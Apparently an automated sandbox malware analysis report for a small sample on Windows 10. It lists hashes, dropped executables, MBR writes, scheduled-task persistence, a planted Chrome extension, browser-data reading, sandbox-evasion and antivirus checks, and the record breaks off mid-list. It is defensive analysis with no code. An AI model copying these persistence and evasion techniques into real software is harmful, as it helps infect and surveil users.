Analysis
-
max time kernel
526s -
max time network
1273s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
07-09-2022 16:16
Static task
static1
Behavioral task
behavioral1
Sample
sample
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
sample
Resource
win10-20220901-en
Behavioral task
behavioral3
Sample
sample
Resource
win10v2004-20220812-en
General
-
Target
sample
-
Size
1KB
-
MD5
563ffac3b2c4488ecd24e81c655ad397
-
SHA1
28eca35a7ebee2f546b35fff21dfe5e96923a36f
-
SHA256
558fbd26ccbafc05c9a2b070abba157dd69b0d212b821149b056a7b98644cbad
-
SHA512
7e969a85fbf142c82961669e31e70f1029126c879602665ae2cd10a487893e4fa0207ea1d1c6ebe360ebadf0b44f834fcaa69de78a076e7edd97b20f0e550fc5
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 154 3804 rundll32.exe 155 3804 rundll32.exe 157 3804 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 31 IoCs
pid Process 336 is-04BPO.tmp 3168 CloneRemover.exe 2324 CloneRemover.exe 4276 w1free.rar_id20808554.exe 1216 OAYk2.exe 764 I7cRaV.exe 3628 tmWQ1yAGoEVPHDWNpKH2.exe 4628 is-5Q7I8.tmp 1512 is-A0L88.tmp 208 Install.exe 4396 fdm-11.exe 3092 SMARTAssistant.exe 524 Install.exe 4964 is-L3J6H.tmp 1668 is-OI5G3.tmp 3272 is-VHAAD.tmp 4564 is-CLNR1.tmp 4456 is-2VSFS.tmp 1472 is-T5169.tmp 2832 CloneRemover.exe 160 CloneRemover.exe 880 CloneRemover.exe 3816 CloneRemover.exe 1560 CloneRemover.exe 4852 CloneRemover.exe 3560 CloneRemover.exe 1572 CloneRemover.exe 3172 CloneRemover.exe 64 CloneRemover.exe 4236 hSziFol.exe 4736 xDAwZRH.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Control Panel\International\Geo\Nation xDAwZRH.exe -
Loads dropped DLL 10 IoCs
pid Process 336 is-04BPO.tmp 4628 is-5Q7I8.tmp 1512 reg.exe 4964 is-L3J6H.tmp 1668 is-OI5G3.tmp 3272 is-VHAAD.tmp 4456 is-2VSFS.tmp 4564 is-CLNR1.tmp 1472 is-T5169.tmp 3804 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks for any installed AV software in registry 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build CloneRemover.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build CloneRemover.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop CloneRemover.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop CloneRemover.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json xDAwZRH.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini xDAwZRH.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 w1free.rar_id20808554.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_D95B16440AF411B0FDAD4BF8DFD1BFC7 xDAwZRH.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_D95B16440AF411B0FDAD4BF8DFD1BFC7 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xDAwZRH.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 xDAwZRH.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol hSziFol.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xDAwZRH.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini hSziFol.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xDAwZRH.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE xDAwZRH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies xDAwZRH.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-OFBK0.tmp is-T5169.tmp File opened for modification C:\Program Files (x86)\TEMole Clone Remover 4.11\unins000.dat is-T5169.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\is-7G41B.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-1HK50.tmp is-VHAAD.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-OUS5J.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-0JMJS.tmp is-2VSFS.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-V8LOH.tmp is-2VSFS.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-59A3C.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-LSQCN.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-JIFVU.tmp is-VHAAD.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-FPFN8.tmp is-2VSFS.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\is-JJF7U.tmp is-T5169.tmp File created C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\YqZRarh.xml xDAwZRH.exe File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-P4AJS.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-JO34C.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-SM9UM.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-VNRSE.tmp is-2VSFS.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-PELQ0.tmp is-2VSFS.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-FLMK3.tmp is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-HDF2A.tmp is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-8NGK4.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-85RAI.tmp is-CLNR1.tmp File opened for modification C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\is-GH5CD.tmp is-VHAAD.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-3PHSS.tmp is-04BPO.tmp File opened for modification C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-C7O6J.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-I0NNU.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-A8S82.tmp is-OI5G3.tmp File opened for modification C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe is-VHAAD.tmp File created C:\Program Files (x86)\jxVmDfoFnnvU2\HjkoHZkUeqwQo.dll xDAwZRH.exe File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-CO9L9.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-1QKFP.tmp is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\is-2SO04.tmp is-VHAAD.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-RSKJE.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-5427Q.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-SGS79.tmp is-T5169.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi xDAwZRH.exe File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-4S1I9.tmp is-VHAAD.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-ORC9V.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-T9M3Q.tmp is-2VSFS.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-1001S.tmp is-T5169.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-33HNH.tmp is-T5169.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-3UROD.tmp is-T5169.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-A0GGI.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-H29T1.tmp is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-RE0F1.tmp is-OI5G3.tmp File opened for modification C:\Program Files (x86)\TEMole Clone Remover 4.11\unins000.dat is-VHAAD.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-IRE33.tmp is-T5169.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-HIEDU.tmp is-T5169.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-P5CR4.tmp is-04BPO.tmp File created C:\Program Files (x86)\Floppy Disk Master\is-RFSDL.tmp is-5Q7I8.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-6N014.tmp is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\is-VRQ43.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-PJ90H.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-FKR98.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-PN9GH.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-HR7MA.tmp is-CLNR1.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\is-5QOTD.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Language\is-U063V.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-NO1RJ.tmp is-04BPO.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\is-3QG5D.tmp is-L3J6H.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-NGT7Q.tmp is-OI5G3.tmp File created C:\Program Files (x86)\TEMole Clone Remover 4.11\Help\img\is-042I7.tmp is-CLNR1.tmp -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File created C:\Windows\Tasks\bQVIyCuucUjqxTYLAY.job schtasks.exe File created C:\Windows\Tasks\NCFohduUlgzsvLtPH.job schtasks.exe File created C:\Windows\Tasks\xRzmvqrNLZCxpjs.job schtasks.exe File created C:\Windows\Tasks\dXlFeCIlfFsViObwD.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 58 IoCs
pid pid_target Process procid_target 3708 3168 WerFault.exe 111 3768 3168 WerFault.exe 111 96 3168 WerFault.exe 111 3544 2324 WerFault.exe 118 4704 2324 WerFault.exe 118 4688 2324 WerFault.exe 118 4848 2324 WerFault.exe 118 4852 2324 WerFault.exe 118 4212 2324 WerFault.exe 118 2064 2324 WerFault.exe 118 4732 2324 WerFault.exe 118 4828 2324 WerFault.exe 118 4976 2324 WerFault.exe 118 2388 2324 WerFault.exe 118 3684 2324 WerFault.exe 118 536 2324 WerFault.exe 118 4964 2324 WerFault.exe 118 4028 2324 WerFault.exe 118 1896 2324 WerFault.exe 118 1672 2324 WerFault.exe 118 5072 2324 WerFault.exe 118 1272 2324 WerFault.exe 118 200 2324 WerFault.exe 118 4308 2324 WerFault.exe 118 2872 2324 WerFault.exe 118 2348 2324 WerFault.exe 118 2304 2324 WerFault.exe 118 3724 2324 WerFault.exe 118 4736 2324 WerFault.exe 118 3496 2324 WerFault.exe 118 3020 2324 WerFault.exe 118 1464 2324 WerFault.exe 118 1832 2324 WerFault.exe 118 5092 2324 WerFault.exe 118 4428 2324 WerFault.exe 118 372 2324 WerFault.exe 118 3980 2324 WerFault.exe 118 1808 2324 WerFault.exe 118 3728 2324 WerFault.exe 118 2232 2324 WerFault.exe 118 4060 2324 WerFault.exe 118 224 2324 WerFault.exe 118 4564 2324 WerFault.exe 118 4544 2832 WerFault.exe 211 3088 2832 WerFault.exe 211 4560 160 WerFault.exe 216 2204 2832 WerFault.exe 211 4272 1560 WerFault.exe 224 3068 880 WerFault.exe 218 4500 880 WerFault.exe 218 3004 880 WerFault.exe 218 3296 3560 WerFault.exe 237 1980 3172 WerFault.exe 243 4204 64 WerFault.exe 248 4548 2324 WerFault.exe 118 224 2324 WerFault.exe 118 784 2324 WerFault.exe 118 4220 2324 WerFault.exe 118 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4368 schtasks.exe 4608 schtasks.exe 864 schtasks.exe 4428 schtasks.exe 4684 schtasks.exe 4724 schtasks.exe 4876 schtasks.exe 5036 schtasks.exe 1528 schtasks.exe 1472 schtasks.exe 3444 schtasks.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Kills process with taskkill 1 IoCs
pid Process 2296 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" xDAwZRH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache xDAwZRH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing xDAwZRH.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" xDAwZRH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" xDAwZRH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ xDAwZRH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b79df8d1-0000-0000-0000-d01200000000}\NukeOnDelete = "0" xDAwZRH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings CloneRemover.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3560 chrome.exe 3560 chrome.exe 4932 chrome.exe 4932 chrome.exe 4468 chrome.exe 4468 chrome.exe 4672 chrome.exe 4672 chrome.exe 4432 chrome.exe 2124 chrome.exe 4432 chrome.exe 2124 chrome.exe 660 chrome.exe 660 chrome.exe 1592 chrome.exe 1592 chrome.exe 328 chrome.exe 328 chrome.exe 4932 chrome.exe 4932 chrome.exe 2456 chrome.exe 2456 chrome.exe 3824 chrome.exe 3824 chrome.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 4276 w1free.rar_id20808554.exe 4276 w1free.rar_id20808554.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 5092 powershell.EXE 5092 powershell.EXE 5092 powershell.EXE 2324 CloneRemover.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 2324 CloneRemover.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe 932 powershell.EXE 932 powershell.EXE 932 powershell.EXE 2324 CloneRemover.exe 2324 CloneRemover.exe 4736 xDAwZRH.exe 4736 xDAwZRH.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
